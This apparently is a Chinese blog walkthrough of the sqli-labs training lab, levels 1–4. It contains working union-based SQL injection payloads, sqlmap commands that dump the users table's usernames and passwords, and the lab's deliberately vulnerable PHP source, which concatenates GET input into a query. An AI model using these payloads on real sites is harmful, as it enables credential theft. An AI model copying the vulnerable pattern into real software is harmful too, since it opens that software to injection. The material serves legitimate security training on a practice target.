sqli-labs关卡(持续更新)

已于 2022-02-13 00:22:13 修改
阅读量4.2k 收藏 2
点赞数 2
分类专栏: SQL注入 文章标签: 安全 web安全
于 2022-01-26 16:55:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58380360/article/details/122523852
版权

文章目录

前言

在Web程序开发的过程中,为了使内容的快速更新,很多的开发者使用数据库去进行数据的存储。由于开发者在编写程序的过程中,对传入用户数据的过滤不严格,将可能存在攻击载荷拼接到SQL查询语句中,再将这些查询语句传递给后端的数据库中执行,从而引起实际执行的语句与预测的功能不一致的情况。这种攻击被称为SQL注入攻击。
SQL注入是开发者对用户输入的参数过滤不严格,导致用户输入的数据能够影响预测查询功能的一种技术,通常会导致数据库原有的信息泄露、篡改,甚至被删除。本次主要是讲sqli-labs中列子,来总结常见的SQL注入的手法。

Less-1

方法一、手工注入

在这里插入图片描述
后端代码的使用的查询语句是:SELECT * FROM users WHERE id=‘1’ LIMIT 0,1
接下来,进行注入测试,猜列数,主要用的是二分法来进行实验
在这里插入图片描述
这里输入的是order by 5发生了报错的现象
在这里插入图片描述
order by 3成功,要把id=不是一个正常的数来进行回显可以利用的字段
在这里插入图片描述
发现2,3是可以利用的
在这里插入图片描述
通过查询的利用知道了版本号以及数据库的名称’security’
报表
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
或者
?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
在这里插入图片描述
出现了emails,referers,uagents和users,显而易见应该是users是用户数据表
报列名(字段)
?id=-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+
在这里插入图片描述
发现user和password
爆值
?id=-1’ union select 1,2,group_concat(username,0x3a,password) from users --+
在这里插入图片描述
0x3a:0x是十六进制的标志,3a是十进制的58,是ascii中的’:‘,用来分割password和username

方法二、sqlmap工具自动注入

清除sqlmap缓存:python sqlmap.py --purge
1)进行暴库,找到数据库类型以及确定有注入点可以利用
python sqlmap.py -u “http://localhost/sqli/Less-1/?id=1” --answers=“extending=N” --batch --threads=20 --technique=E --dbs
在这里插入图片描述
发现数据库版本是MySQL
2)查看当前使用的数据库
python sqlmap.py -u “http://localhost/sqli/Less-1/?id=1” --answers=“extending=N” --batch --threads=20 --technique=E --dbms=mysql --current-db
在这里插入图片描述
3)查看数据库中的表
python sqlmap.py -u “http://localhost/sqli/Less-1/?id=1” --answers=“extending=N” --batch --threads=20 --technique=E --dbms=mysql -D security --tables
在这里插入图片描述
4)爆取users表中的来获取字段
python sqlmap.py -u “http://localhost/sqli/Less-1/?id=1” --answers=“extending=N” --batch --threads=20 --technique=E --dbms=mysql -D security -T users -columns
在这里插入图片描述
5)获取字段
python sqlmap.py -u “http://localhost/sqli/Less-1/?id=1” --answers=“extending=N” --batch --threads=20 --technique=E --dbms=mysql -D security -T users -C password,username -dump在这里插入图片描述

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-1 **Error Based- String**</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables 
if(isset($_GET['id']))                                                 #这里的GET方法用于传输id值
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";                     #用来拼接id值
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>

本题是基于字符型的错误。
当然,除了注释,也可以利用单引号来闭合后面的单引号
现在将?id=1’ and '1,这个时候的查询也可以出现正常的回显
在这里插入图片描述
关键字WHERE是SELECT操作的一个判断的条件,之前的id=1即查询条件。这里,AND代表需要同时满足两个条件,一个是id=1,另一个是’1‘。由于字符串’1‘被强制转换成True,代表这个条件成立,因此数据库查询出id=1的记录

less-2

先看有多少列
?id=1 order by 3#
在这里插入图片描述
查看数据库以及版本
/?id=-1 union select 1,version(),database()#
在这里插入图片描述
/?id=-1 union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=‘security’#
在这里插入图片描述
同时也可以将security换成database()
/?id=-1 union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述
爆列
/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’#
在这里插入图片描述
爆字段
/?id=-1 union select 1,2,group_concat(username,0x7e,password) from security.users#
在这里插入图片描述

Less-3

找到注入点
/?id=1’) and 1=1 --+
在这里插入图片描述
查看几列
/?id=1’) order by 3 --+
在这里插入图片描述
看看数据库版本以及名称
/?id=-1’) union select 1,version(),database() --+
在这里插入图片描述
查看数据库
/?id=-1’) union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
在这里插入图片描述
爆列
/?id=-1’) union select 1,version(),group_concat(column_name) from information_schema.columns where table_name=‘users’ --+
在这里插入图片描述
爆字段
/?id=-1’) union select 1,version(),group_concat(username,0x7e,password) from security.users --+
在这里插入图片描述

Less-4

找注入点
/?id=1") and 1=1 --+
在这里插入图片描述
找列
/?id=1") order by 3 --+
在这里插入图片描述
数据库的版本以及数据库
/?id=-1") union select 1,version(),database() --+
在这里插入图片描述
爆列
/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+
在这里插入图片描述
爆字段
/?id=-1") union select 1,2,group_concat(username,0x7e,password) from security.users–
在这里插入图片描述

Less-5

不见星光见月光
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less - 62、63、64、65(sqli-labs闯指南 62、63、64、65)
m0_54899775的博客
12-30 1827
sqli-labs Less - 62、63、64、65(sqli-labs闯指南 62、63、64、65)
详细sqli-labs(1-65)通讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs大详解(完结)
hxhxhxhxx的博客
07-28 5万+
sqlilabs详解(不断更新)题目1-10Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)GET - Error based - Intiger based (基于错误的GET整型注入)Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)Less-4 GET - Error based - Double Quotes
sqli-labs通详解(1-20
最新发布
2302_81105681的博客
04-11 2286
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 3873
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
Sqli-labs环境搭建教程(sql注入)
Victor1889的博客
01-06 9088
Sqli-labs环境搭建教程(sql注入)
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs靶场安装
剁椒鱼头没剁椒的博客
10-22 6749
PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。Sqlilabs是一个学习sql注入的平台,GET和POST场景包括了许多基本的实验内容,例如:基于错误的注入、盲注、更新查询注入、插入查询注入、Header注入、二次注入、Bypass WAF、堆叠注入等等。
SQLi-Labs 安装
SunJ3t的菠萝屋
05-24 6507
1. 前言 我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。 这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。 注意: PHP 版本一定要设置成 PHP5 以上,PHP7 以下,PHP5 以上才有 information_schema 库,PHP7 之后的 mysql_ 都改成了 mysqli_** 了,所以用其他版本的 PHP
Sqli-lab教程-史上最全详解(1-22通
qq_52364123的博客
04-10 8420
sql注入集合
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 611
sql注入基础操作及相sqli-labs关卡流程
sqli-labs
qq_51110485的博客
07-16 1026
sqli-labsLess-1Less-2Less-3Less-4Less-5Less-6 Less-1 进入关卡内,先判断是否存在注入情况 先输入?id =1 and 1=1,发现没有变化,换成?id=1 and 1=2,依旧没有变化,考虑是为字符型而非整形。 用?id=1'进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入 发现为字符型的后先在后面加一个注释符 --+,可以正常输出 单行注释: 1.使用#注释符,#注释符后直接加注释内容 2.使用–注释符,–注释符后需要加一个空格,注释才能
基于PHPstudy部署SQLi-labs靶场
北冥同学的成长记录笔记
04-25 1274
SQL注入漏洞是WEB安全方向的一个重要组成,一个好的练习靶场更有利于学习者更直观的理解漏洞原理,利用PHPstudy集成工具对SQLi-labs靶场进行轻便式搭建是一个对于初学者而言最好不过的选择。文中首先对SQLi-labs靶场进行了简要的介绍,然后详细的介绍了如何安装、配置适合SQLi-labs靶场部署的WEB环境,进而介绍如何在PHPstudy中部署SQLi-labs靶场,最后还将部署过程中可能出现的问题做出解释和给出解决方案。这是一篇给网络安全初学者在SQL注入漏洞学习过程中的靶场部署教程。
web靶场 --- sqli-labs
L0g1c的博客
07-06 1303
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
SQLi-LABS(1~10详解)
CTF小白的博客
09-22 6384
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库中的表查表中的字段查数据SQLi-LABS Less-4查看题目环境测试...
sqli-labs闯
10-09
很高兴为您解答sqli-labs闯的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯,您可以按照以下步骤进行: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值